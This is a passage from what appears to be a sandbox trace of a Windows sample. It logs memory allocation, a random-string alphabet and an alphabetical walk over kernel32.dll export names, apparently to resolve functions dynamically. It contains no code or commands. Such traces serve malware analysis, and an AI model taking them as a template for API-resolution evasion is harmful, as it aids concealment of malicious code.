(lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.175] GetTickCount () returned 0x114c497 [0079.175] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.175] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.175] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.176] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.176] lstrlenA (lpString="kernel32.dll") returned 12 [0079.176] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.176] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.176] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.176] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.176] lstrlenA (lpString="ADDATOMA") returned 8 [0079.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.176] lstrlenA (lpString="ADDATOMW") returned 8 [0079.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.176] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.176] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.176] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.176] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.176] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.177] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.177] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.177] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.177] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.177] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.177] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.177] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.177] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.177] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.177] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.177] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.177] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.177] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.177] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.177] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.177] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.177] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.177] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.177] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.178] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.178] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.178] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.178] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.178] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.178] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.178] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.178] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.180] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.180] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.180] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.180] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.180] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.180] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.181] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.181] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.181] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.181] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.181] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.181] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.181] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.181] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.181] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.181] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.181] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.181] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.181] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.181] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.181] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.181] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.181] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.181] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.181] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.182] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.182] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.182] lstrlenA (lpString="BEEP") returned 4 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.182] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.182] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.182] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.182] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.182] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.182] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.182] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.182] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.182] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.182] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.182] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.183] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.183] lstrlenA (lpString="CANCELIO") returned 8 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.183] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.183] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.183] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.183] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.183] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.183] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.183] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.183] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.183] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.183] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.183] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.183] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.183] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.183] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.183] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.183] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.183] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.184] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.184] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.184] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.184] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.184] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.184] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.184] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.184] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.184] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.184] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.184] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.184] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.184] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.184] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.184] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.184] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.184] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.184] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.184] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.184] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.185] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.185] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.185] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.185] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.185] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.185] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.185] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.185] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.185] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.185] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.185] lstrlenA (lpString="COPYFILEA") returned 9 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.185] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.185] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.185] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.185] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.185] lstrlenA (lpString="COPYFILEW") returned 9 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, 